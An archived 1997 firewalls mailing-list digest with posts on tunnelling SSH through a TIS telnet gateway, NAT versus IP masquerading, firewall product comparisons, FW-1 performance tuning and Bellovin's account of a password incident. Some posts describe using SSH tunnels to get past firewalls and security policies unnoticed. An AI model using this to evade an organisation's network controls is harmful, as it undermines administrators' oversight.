<3393536C.4A06865E@crl.com> Date: Mon, 02 Jun 1997 16:12:44 -0700 From: "Zot O'Connor" Reply-To: zot@crl.com Organization: Zot Consulting X-Mailer: Mozilla 4.0b3 [en] (Win95; I) MIME-Version: 1.0 To: Firewalls list Subject: ssh proxy for tn-gw X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here is info from the README. This requires a host to have tn-gw on the receiving end. Apparently tn-gw uses several characters as codes and tn-nav-gw escapes these for the client, and then unescapes them for the server. This works for me since I go to many clients who have tn-gw up and I cannot control the firewall. Once out to my home, I can ssh to the site I need. What is it? ----------- tn-gw-nav is a program to allow you to use SSH (http://www.cs.hut.fi/ssh/) to connect to a host which is on the outside of a TIS fwtk derived telnet gateway. The host on the outside must also be configured to use tn-gw-nav. Getting the Source ------------------ ftp://ftp.nlc.net.au/pub/unix/tn-gw-nav Contact the Authors ------------------- John Saunders Charlie Brady ow does it work? ----------------- SSH has a feature which allows you to use a program as a proxy to establish a connection to the SSHD server. One of the functions of tn-gw-nav is to negotiate the connection through the telnet gateway. The other function of tn-gw-nav is to create a clean 8 bit stream between ssh and sshd after the connection is created. The telnet gateway unfortunately treats a few characters as special - these need to be escaped to traverse the gateway safely, then unescaped before being fed to the SSHD server. Because tn-gw-nav must run at both ends of the connection, it does not directly provide a general solution to using ssh through the telnet gateway. Once you have one ssh connection with a tn-gw-nav equipped host, however, you will then be able to use ssh from there to anywhere else using ssh. If the unescaping code was added to sshd, enabled on a host by host basis through a config entry in /etc/sshd_config, then tn-gw-nav would only be required at the SSH client end. A patch for SSHD is on the TODO list. Zot O'Connor From owner-firewalls-outgoing Mon Jun 2 17:15:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA12649 for firewalls-outgoing; Mon, 2 Jun 1997 17:10:18 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA12640 for ; Mon, 2 Jun 1997 17:10:13 -0700 (PDT) Received: from pp (pp.ksc.nasa.gov [128.159.174.102]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id RAA01684 for ; Mon, 2 Jun 1997 17:16:05 -0700 (PDT) Received: from kscgws00.ksc.nasa.gov by pp with SMTP (PP); Mon, 2 Jun 1997 19:15:01 -0400 Received: by kscgws00.ksc.nasa.gov with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC6F89.1C555B90@kscgws00.ksc.nasa.gov>; Mon, 2 Jun 1997 19:13:53 -0400 Message-ID: From: "Ferrell-1, Ema" To: "'firewalls@greatcircle.com'" Subject: Difference between NAT and IP Masquerading Date: Mon, 2 Jun 1997 19:13:48 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All, Could someone explain the difference between Network Address Translation and IP Masquerading. Which is better to use? What firewall products offer which? TIA, Ema Ferrell Checkout & Launch Control System Hardware Design Division Support Networks/DE-CLC-A 407-861-xxxx(phone #) 407-861-7470 (fax #) From owner-firewalls-outgoing Mon Jun 2 17:45:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA16190 for firewalls-outgoing; Mon, 2 Jun 1997 17:34:31 -0700 (PDT) Received: from m2.sprynet.com (m2.sprynet.com [165.121.1.99]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id RAA16089 for ; Mon, 2 Jun 1997 17:34:12 -0700 (PDT) Received: from pcarlson.raptor.com (dd29-254.compuserve.com [199.174.146.254]) by m2.sprynet.com (8.6.12/8.6.12) with SMTP id RAA02531; Mon, 2 Jun 1997 17:38:04 -0700 Message-Id: <3.0.1.32.19970602183756.006891b0@m2.sprynet.com> X-Sender: carlsonp@m2.sprynet.com X-Mailer: Windows Eudora Light Version 3.0.1 (32) Date: Mon, 02 Jun 1997 18:37:56 -0600 To: "Maurizio Fiocchi" , From: Peter Carlson Subject: Re: PIX and Firewall-1 In-Reply-To: <199706021345.MAA09733@otmfire.otm.it> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There are many comparisons made by datacomm, lan times, ziff-davis and others. Keep in mind that both pix and fw-1 are glorified packet filters, even though they have a fancy name for it. I wouyld stick with an application level gateway. They are well accepted and known for being more secure. -Peter At 12:33 PM 6/2/97 +0200, Maurizio Fiocchi wrote: >I am appraising two firewall, the first Pix and the second Firewall-1. > From an attentive analysis I have noticed that the two SW have a notable >difference regarding the characteristics of administration and of >performances. > >I was wondering an analysis it exists or a comparison between the two SW so >that I could choose without mistake. ? > >Do available documents exist ? > >Thank you > From owner-firewalls-outgoing Mon Jun 2 18:00:34 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA15557 for firewalls-outgoing; Mon, 2 Jun 1997 17:31:19 -0700 (PDT) Received: from m2.sprynet.com (m2.sprynet.com [165.121.1.99]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id RAA15537 for ; Mon, 2 Jun 1997 17:31:12 -0700 (PDT) Received: from pcarlson.raptor.com (dd29-254.compuserve.com [199.174.146.254]) by m2.sprynet.com (8.6.12/8.6.12) with SMTP id RAA00137; Mon, 2 Jun 1997 17:35:05 -0700 Message-Id: <3.0.1.32.19970602183402.00689ff8@m2.sprynet.com> X-Sender: carlsonp@m2.sprynet.com X-Mailer: Windows Eudora Light Version 3.0.1 (32) Date: Mon, 02 Jun 1997 18:34:02 -0600 To: Bill Stout , firewalls@GreatCircle.COM From: Peter Carlson Subject: Re: NSC Firewall experience? In-Reply-To: <2.2.32.19970530220016.00adbcb8@vaxf.pios.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A whole bunch of headaches. I used to work for a company that had NSC routers implemented, besides shoddy code, ridiculous support and routers that just didn't function according to the basic thoeries of routing, they didn't have too bad of a product. ;-) -Peter At 03:00 PM 5/30/97 -0700, Bill Stout wrote: >NSC Firewalls were recommended by a consulting firm for a customer. From >what I can determine from their website so far, BorderGuard/NetSentry >products are basically filtering routers, not firewalls. So far I don't see >a difference between NSC BorderGuard and normal Cisco routers' capability to >do extended filtering and VPNs. > >What am I missing? Comments? > > >_____________________________________________________________________________ >Bill Stout (Systems Engineer/Consultant) stoutb@pios.com >Pioneer Standard (Computer Systems & Components) http://www.pios.com/ >San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 >*My opinions do not reflect that of the company, and visa-versa, thankfully.* > From owner-firewalls-outgoing Mon Jun 2 18:45:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA26220 for firewalls-outgoing; Mon, 2 Jun 1997 18:42:42 -0700 (PDT) Received: from mail.marben.com (losgatos.sjc.marben.com [206.86.34.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id SAA26203 for ; Mon, 2 Jun 1997 18:42:34 -0700 (PDT) Received: (from girsch@localhost) by mail.marben.com (SMI-8.6/SMI-SVR4/MPI-AG(12)) id SAA22532 ; Mon, 2 Jun 1997 18:43:29 -0700 From: girsch@marben.com (Arnaud Girsch) Message-Id: <199706030143.SAA22532@mail.marben.com> Subject: Re: ssh proxy for fwtk To: pnash@hanshan.bbnplanet.com Date: Mon, 2 Jun 1997 18:43:28 -0700 (PDT) Cc: don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@greatcircle.com, ylo@cs.hut.fi In-Reply-To: <19970528182528.5140.qmail@hanshan.bbnplanet.com> from "pnash@hanshan.bbnplanet.com" at May 28, 97 02:25:28 pm X-Organization: Marben Products, Inc. / DSET Corporation X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I think they're looking for something a bit more covert, so that they > don't have to get their firewall admin to setup a plug.. Tunneling > always brings up interesting problems when trying to control users.. Does > anyone know if there are "intelligent" proxies that can detect when the > proxy connects to a ssh server, or whatever via the various handshaking > that partakes. Even if it just looks for "SSH-1.5-1.2.20" or somesuch, it > can alert you to users getting around your policy. > In my mind, ssh is the easiest way to get around security policies > provided you have access to a telnet proxy or http proxy.. Tunnel through > the proxy to a remote site, and now you have access to X, tunnel whatever > apps you want, ftp files, etc.. It's all encrypted so the admin would > never know.. Although you have a valid point that proxies are an open door to get around security policies, I think you have to first think why you have a policy at the first place. Do you restrict the access because you want to restrict your users or because you want to secure your neetwork ? For example, you probably restrict X because you think that X is never secure and can be abused, etc ... Giving access to X within a ssh tunnel protects against most of the X problems, so why not giving X access then ? ftp'ing files is another matter, as the transit is not the only concern in that case. As an admin ... do you want to know exactly what your users are doing ? sure, you want to know what kind of stuff they're doing, but you don't want to know what's inside the stuff they're doing .... If you can give them access to some ressources (X, etc ...) in a secure manner, I don't see any reason why you should not. Maybe I'm wrong and missed something :-) Arnaud. Note: "you" wasn't directed to one person directly :-) -- Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/ From owner-firewalls-outgoing Mon Jun 2 23:00:27 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA09331 for firewalls-outgoing; Mon, 2 Jun 1997 22:57:25 -0700 (PDT) Received: from ren.globecomm.net (ren.globecomm.net [207.51.48.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA09324 for ; Mon, 2 Jun 1997 22:57:20 -0700 (PDT) Received: from chiba (syd2-ppp-152.tpgi.com.au [203.29.157.152]) by ren.globecomm.net (8.8.5/8.8.0) with SMTP id CAA08398 for ; Tue, 3 Jun 1997 02:00:46 -0400 (EDT) Date: Mon, 2 Jun 1997 16:01:30 +1000 (EST) From: Warpy To: firewalls@GreatCircle.COM Subject: SSH Equiv for FTP? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was wondering whether there was an equivalent to SSH for ftp. Does anyone know if there is? Warpy From owner-firewalls-outgoing Mon Jun 2 23:30:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA10714 for firewalls-outgoing; Mon, 2 Jun 1997 23:18:57 -0700 (PDT) Received: from sunphil ([208.142.163.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id XAA10697 for ; Mon, 2 Jun 1997 23:18:49 -0700 (PDT) Received: by sunphil (SMI-8.6/SMI-SVR4) id OAA16536; Tue, 3 Jun 1997 14:16:42 -0800 Date: Tue, 3 Jun 1997 14:16:42 -0800 From: drexx@pspi.com.ph (Drexx Laggui) Message-Id: <199706032216.OAA16536@sunphil> To: fw-1-mailinglist@us.checkpoint.com, solid@mozcom.com, firewalls@greatcircle.com Subject: Re: [FW1] Performance monitoring for FW-1 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk |> From: "Jet B. Bagadion" |> |> Hello everybody, |> |> How will I monitor Firewall-1 performance? Please send some tips on how I |> can improve its performance. |> Hello Jet, 1] On a Sun H/W: 1.1] On a Sun Solaris platform, the easiest way is to use the Performance Meter (/usr/openwin/bin/perfmeter). Just right-mouse click to get to the Properties menu and select the parameters you'd like to monitor (CPU, RAM, network utilization, etc.) 1.2] On checking the FW-1 host disk activity, do prompt# iostat -x 30 Look at the b values (from the whole 30 samples) and average it. If it's more than 35% utilized then it is rather busy. Either stripe it or get a faster disk then. 1.3] For checking network performance, do prompt# netstat -i 30 A network output with too many collisions reduces throughput and increases response time. Upgrade to a faster network if necessary. 1.4] On CPU and memory rules, use prompt# vmstat 30 If the "swap" values are (1000k <= 10000k) or worse, then the system may soon run out of virtual memory. Try to add more swap. If the "sr" values are (200 <= 300), then the system is scanning through memory looking for more pages to free at a high rate. This indicates that, as well as inactive pages, active pages maybe stolen from processes. If the "r" values are from (3 <= 5), then there is insufficient CPU power. Jobs are spending an increasing amount of time in the queue before being asigned to a CPU. This reduces throughput and increases response time. 2.0] On the FW-1 application, do prompt# fw ctl pstat If too low, edit the /etc/system file with fw:fwhmem=0x100000 (~1MB RAM). 3.0] Search out Adrian Cockroft's columns on www.sun.som/sunworld for more info. Hanggang sa muli, Drexx. "It's a dirty job, but somebody's gotta do it." -- John Wayne ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ ______ /_____/\ DEXTER D. LAGGUI /_____\\ \ Systems Engineer, Systems Integration Group /_____\ \\ / PHILIPPINE SYSTEMS PRODUCTS INC. /_____/ \/ / / Penthouse, Corporate Business Center /_____/ / \//\ 150 Paseo de Roxas Ave., Legaspi Village \_____\//\ / / Makati City, Philippines \_____/ / /\ / \_____/ \\ \ Phone: (++ 63-2) 813-6453 to 55 loc. 222 \_____\ \\ Fax : (++ 63-2) 813-5834 \_____\/ Email: drexx@pspi.com.ph Pager: (++ 63-2) 1277-33615 ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ From owner-firewalls-outgoing Tue Jun 3 00:15:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA13725 for firewalls-outgoing; Mon, 2 Jun 1997 23:50:09 -0700 (PDT) Received: from hp00086.ina.de (hp00086.ina.de [159.51.6.8]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id XAA13609 for ; Mon, 2 Jun 1997 23:49:47 -0700 (PDT) Received: from hp00002.koi.ina.de (hp00002.ina.de) by hp00086.ina.de with ESMTP (1.37.109.18/INA-1.0-SER) id AA265690749; Tue, 3 Jun 1997 08:52:30 +0200 Received: from pc00874.ina.de by koi.ina.de with SMTP (1.37.109.24/INA-1.0) id AA191920698; Tue, 3 Jun 1997 08:51:38 +0200 Received: by pc00874.ina.de with Microsoft Mail id <01BC6FFB.76D33980@pc00874.ina.de>; Tue, 3 Jun 1997 08:52:28 +0200 Message-Id: <01BC6FFB.76D33980@pc00874.ina.de> From: Basil McCrea To: "'firewalls@greatcircle.com'" Subject: Netscape and Port IS411-srvr Date: Tue, 3 Jun 1997 08:52:26 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, We have a few NT boxes with Netscape and our firewall logs that they try to access 205.218.156.41 on port 6499 (IS411-srvr). Network 205.218.156 belongs to Netscape. Does anyone know what they are trying to do? TIA Basil McCrea From owner-firewalls-outgoing Tue Jun 3 01:00:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA22328 for firewalls-outgoing; Tue, 3 Jun 1997 00:50:43 -0700 (PDT) Received: from mailgw1.almaden.ibm.com (mailgw1.almaden.ibm.com [198.4.83.39]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA22293 for ; Tue, 3 Jun 1997 00:50:30 -0700 (PDT) Received: by mailgw1.almaden.ibm.com(Lotus SMTP MTA v1.1 (385.6 5-6-1997)) id 882564AB.002BBAA2 ; Tue, 3 Jun 1997 00:57:38 -0700 X-Lotus-FromDomain: ALMADEN From: "Tony Rall" To: firewalls@greatcircle.com Message-ID: <882564AB.002AE100.00@mailgw1.almaden.ibm.com> Date: Tue, 3 Jun 1997 00:53:31 -0700 Subject: Re: Difference between NAT and IP Masquerading Mime-Version: 1.0 Content-type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Could someone explain the difference between Network Address Translation >and IP Masquerading. Which is better to use? What firewall products >offer which? NAT supports hiding n internal addresses behind m external addresses, where n is usually less than m. IPMasq is a subset of NAT where n=1. One of these is likely available on a number of products; IBM's Firewall (nee SNG) supports NAT. Tony Rall From owner-firewalls-outgoing Tue Jun 3 01:30:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA21898 for firewalls-outgoing; Tue, 3 Jun 1997 00:47:34 -0700 (PDT) Received: from paranoid.convey.ru (ws04.convey.ru [195.182.128.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA21890 for ; Tue, 3 Jun 1997 00:47:28 -0700 (PDT) Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id LAA26531; Tue, 3 Jun 1997 11:50:26 +0400 From: ArkanoiD Message-Id: <199706030750.LAA26531@paranoid.convey.ru> Subject: Re: SSH Equiv for FTP? To: warpy@null.net (Warpy) Date: Tue, 3 Jun 1997 11:50:25 +0400 (MSD) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Warpy" at Jun 2, 97 04:01:30 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk nuqneH, > > I was wondering whether there was an equivalent to SSH for ftp. Does > anyone know if there is? > You can use ftp over ssh with port forwarding feature.. -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! From owner-firewalls-outgoing Tue Jun 3 04:30:14 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA11675 for firewalls-outgoing; Tue, 3 Jun 1997 04:26:44 -0700 (PDT) Received: from ns.research.att.com (ns.research.att.com [192.20.225.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id EAA11667 for ; Tue, 3 Jun 1997 04:26:29 -0700 (PDT) Received: from research.att.com ([135.205.32.20]) by ns; Tue Jun 3 07:29:02 EDT 1997 Received: from smb.research.att.com ([135.205.55.9]) by research; Tue Jun 3 07:27:35 EDT 1997 Received: from smb.research.att.com (smb@localhost) by smb.research.att.com (8.8.5/8.8.5) with ESMTP id HAA04720 for ; Tue, 3 Jun 1997 07:27:33 -0400 (EDT) Message-Id: <199706031127.HAA04720@smb.research.att.com> From: Steve Bellovin To: firewalls@greatcircle.com Subject: Re: Bungled password management at WorldNet Date: Tue, 03 Jun 1997 07:27:32 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Enclosed below is my note to RISKS on the report of a security problem at AT&T Worldnet. ------- Forwarded Message From: Steve Bellovin To: risks@csl.sri.com Subject: Re: How Secure Is AT&T's WorldNet Security? Date: Thu, 29 May 1997 23:04:22 -0400 Sender: smb@smb.research.att.com The story about an eavesdropping incident on AT&T Worldnet is incorrect. In fact, a later story by the same author says as much (see http://www.pcworld.com/news/daily/data/0597/970523154723.html). But there are some lessons to be learned from what happened. The original report noted that certain Web pages do not use encryption. We were already aware of this, and the upgrade was in progress even before this incident. But the report also claimed that as a result of the lack of encryption, a customer was able to observe other accounts and passwords going by. This struck us as more than slightly odd, since the user was coming in from a dial-up modem... I won't bother enumerating all the possibilities we considered and investigated. The ultimate answer was that there was no eavesdropping going on; rather, a network administrator had extracted accounts and passwords for a number of users from a LAN-based file server, and fed these into a simulated network monitor program. And how did these passwords get there? Well, various people used a shared facility -- that is, a network of PCs -- as their platform for connecting to AT&T Worldnet. This exposed their passwords to anyone with suitable access to the file server -- which is what happened. What can we learn from this? The first point, of course, is that the system administrator wins -- always. Nothing short of token-based encryption is even a plausible defense against someone who can read any file, and plant programs to monitor keystrokes. (That latter didn't happen here, to my knowledge.) A corollary is that you can't meaningfully encrypt such files, if the enemy is a knowledgeable administrator. If the key is stored in your programs, it can be extracted; the same skills that are used to defeat copy protection will suffice. At most, such encryption is a minor hurdle; more likely, it's security through obscurity, giving the same grade of protection as the lock on a bathroom door. Could the user supply the key? Part of the answer is "no, see above about keystroke monitors". But there's a more fundamental issue, one that goes to the heart of the real problem. When we deploy computer systems, we engineer them. That is, we choose among many possible designs, to balance needs against costs. There is no such thing as absolute security, of course; more importantly, there is a price to any security system, and it makes no sense to spend more on security than it can save you. We're dealing here with a mass market product. J. Random Customer *will*, with a fairly high probability, forget his or her password. The cost of an unrecoverable account is quite high -- we probably lose the customer. But it has to be taken a step further -- it's important to minimize the number of calls to Customer Care. (Customer Care is expensive in the mass market world. There are a fair number of software packages around for which the vendor loses money on any copy that generates even a single call.) This, then, is the bottom line. The engineers who made certain security choices -- storing account information in the clear -- saved a moderate amount of money, traded against a small dimunition in security. The customers who used a shared facility to store these account information files (unknowingly) trusted someone else. The overall complexity of the total system -- the AT&T Worldnet end, the user software, the end users, and their environment, including an untrustworthy administrator -- led to some accounts being compromised. And the one simple palliative cited -- encryption of certain network sessions -- would have done nothing to protect anyone. --Steve Bellovin ------- End of Forwarded Message From owner-firewalls-outgoing Tue Jun 3 05:15:32 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA15424 for firewalls-outgoing; Tue, 3 Jun 1997 05:08:38 -0700 (PDT) Received: from portal.east.saic.com (portal.east.saic.com [198.151.13.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA15396 for ; Tue, 3 Jun 1997 05:08:23 -0700 (PDT) Received: from blazer.cist.saic.com ([149.8.156.11]) by portal.east.saic.com via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 3 Jun 1997 12:13:46 UT Received: from obiwan.cist.saic.com (unverified [149.8.156.16]) by blazer.cist.saic.com (EMWAC SMTPRS 0.83) with SMTP id ; Tue, 03 Jun 1997 08:07:33 -0400 Message-ID: From: "Chris Kostick" To: "Ferrell-1, Ema" , "'firewalls@greatcircle.com'" Subject: Re: Difference between NAT and IP Masquerading Date: Tue, 3 Jun 1997 08:03:52 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Could someone explain the difference between Network Address Translation > and IP Masquerading. Which is better to use? What firewall products > offer which? IP Masquerading is a subset of NAT. NAT supports address translation in the scenarios of 1:1, many:1, and many:n. IP masquerading is just many:1. -- Chris From owner-firewalls-outgoing Tue Jun 3 05:45:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA18160 for firewalls-outgoing; Tue, 3 Jun 1997 05:39:35 -0700 (PDT) Received: from vax01.newman.com (newman.com [152.160.11.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA18145 for ; Tue, 3 Jun 1997 05:39:29 -0700 (PDT) Received: by vax01.newman.com (UCX V2.0-15) Tue, 3 Jun 1997 08:43:50 -0400 Received: by bass.unifiedtech.com (SMI-8.6/SMI-SVR4) id IAA15729; Tue, 3 Jun 1997 08:40:53 -0400 Date: Tue, 3 Jun 1997 08:40:53 -0400 From: jonesmd@newman (Mike Jones) Message-Id: <199706031240.IAA15729@bass.unifiedtech.com> To: mfiocchi@otm.it, firewalls@GreatCircle.COM, carlsonp@sprynet.com Subject: Re: PIX and Firewall-1 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Content-MD5: 8NWlASTDmSIsoadQIzZk4A== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter Carlson writes.... > There are many comparisons made by datacomm, lan times, ziff-davis and > others. Keep in mind that both pix and fw-1 are glorified packet = filters, > even though they have a fancy name for it. I wouyld stick with an > application level gateway. They are well accepted and known for being = more > secure. Many things are known that aren't so. This claim comes by periodically in this forum, and I have yet to get an answer to this question: in=20 whatway are application level gateways more secure than, say, FW-1 or = PIX? There are certainly capabilities that can be provided via application=20 proxies that can't be provided by any filter-based technologies, but = what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't? -- Mike Jones Sr. Technology Advisor UNIFIED Technologies From owner-firewalls-outgoing Tue Jun 3 06:30:24 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA21828 for firewalls-outgoing; Tue, 3 Jun 1997 06:28:40 -0700 (PDT) Received: from bings.kpmg.co.at (bings.kpmg.co.at [193.154.65.9]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA21820 for ; Tue, 3 Jun 1997 06:28:33 -0700 (PDT) Received: (from daemon@localhost) by bings.kpmg.co.at (8.8.3/8.8.3) id PAA06533 for ; Tue, 3 Jun 1997 15:49:42 +0200 Received: from fiss.kpmg.co.at(193.80.10.3) via SMTP by bings.kpmg.co.at, id smtpd06529aaa; Tue, 3 Jun 97 15:49:34 +0200 Received: from bings.kpmg.co.at (vtcpuser@bings.kpmg.co.at [193.80.11.9]) by fiss.kpmg.co.at (8.8.5/8.8.5) with SMTP id PAA32749 for ; Tue, 3 Jun 1997 15:33:26 +0200 Date: Tue, 03 Jun 1997 15:28:39 +0100 From: "Willibald Kraml" To: firewalls@GreatCircle.COM Subject: Re: Difference between NAT and IP Masquerading Message-ID: <2063292994.865351719@bings.kpmg.co.at> X-Mailer: Mulberry (Win32) [1.2.0, s/n Evaluation] X-Authenticated: wkraml by fiss.kpmg.co.at X-Licensed-To: Unlicensed - for evaluation only MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --On Dienstag, 03. Juni 1997, 00:53 -0700 "Tony Rall" wrote: > >>Could someone explain the difference between Network Address Translation >>and IP Masquerading. Which is better to use? What firewall products >>offer which? > NAT supports hiding n internal addresses behind m external addresses, where n is > usually less than m. > > IPMasq is a subset of NAT where n=1. > > One of these is likely available on a number of products; IBM's Firewall (nee > SNG) supports NAT. > > Tony Rall > With Linux, IP masquerading hides n internal addresses behind (normally) 1 external address; n usually is at least 2 (one network interface on the masquerading box and at least one client on the internal network). The xternal address can also be a dynamic IP address, so you can connect a LAN to the Internet with a dial-up IP connection ... Willi Kraml From owner-firewalls-outgoing Tue Jun 3 07:13:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA23283 for firewalls-outgoing; Tue, 3 Jun 1997 06:46:22 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA23267 for ; Tue, 3 Jun 1997 06:46:16 -0700 (PDT) Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id JAA17464 for ; Tue, 3 Jun 1997 09:49:17 -0400 (EDT) Message-Id: <199706031349.JAA17464@mail.clark.net> Comments: Authenticated sender is From: "Marcus J. Ranum" Organization: Network Flight Recorder, Inc. To: Firewalls@GreatCircle.COM Date: Tue, 3 Jun 1997 09:47:53 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Plug-gw- One to many relationship Reply-to: mjr@clark.net In-reply-to: <199706030631.XAA11683@honor.greatcircle.com> X-mailer: Pegasus Mail for Win32 (v2.53/R1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone gotten a one to many relationship to work > with FWTK 2.0? The one to many support requires kernel modifications in order to work. Basically, you need code that absorbs all packets going through the firewall, and the pulls the "real" destination out of the routing layer and connects to it. So, unless you want to spend a month or so on writing some pretty subtle kernel hacks, you can't do it with just FWTK. mjr. ----- Marcus J. Ranum, CEO, Network Flight Recorder, Inc. Personal Work New Book!! From owner-firewalls-outgoing Tue Jun 3 07:31:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA26087 for firewalls-outgoing; Tue, 3 Jun 1997 07:18:41 -0700 (PDT) Received: from calamari.Progressive-Systems.Com (calamari.Progressive-Systems.Com [206.236.37.16]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA26060 for ; Tue, 3 Jun 1997 07:18:32 -0700 (PDT) Received: (from ge@localhost) by calamari.Progressive-Systems.Com (8.7.5/8.7.3) id KAA19020 for Firewalls@GreatCircle.COM; Tue, 3 Jun 1997 10:22:08 -0400 (EDT) From: "Ge' Weijers" Message-Id: <199706031422.KAA19020@calamari.Progressive-Systems.Com> Subject: Re: ipfwadm question To: Firewalls@GreatCircle.COM Date: Tue, 3 Jun 1997 10:22:08 -0400 (EDT) In-Reply-To: <199706030631.XAA11683@honor.greatcircle.com> from "Firewalls-Digest" at Jun 2, 97 11:31:23 pm Reply-To: ge@progressive-systems.com (Ge' Weijers) Organization: Progressive Systems, Inc. X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Gateway Box > | > | > Firewall Box > | > | > LAN Router > / | \ > / | \ > / | \ > Node 1 Node 2 Node 3 > This picture is correct, a 'firewall' is sitting between the Big Bad Internet and your LAN. The 'LAN Router' would be missing at small sites. This design has its drawbacks if any of 'Node 1..3' has to be accessible from the Internet. Say if Node 1 receives e-mail it can be vulnerable to breakins. Anyone breaking into this machine can then use it as a stepping stone to attack the rest of your network. You may want to place some hosts on the Internet side of the firewall to prevent that from happening. If your Internet gateway has a static packet filtering capability you can further limit your 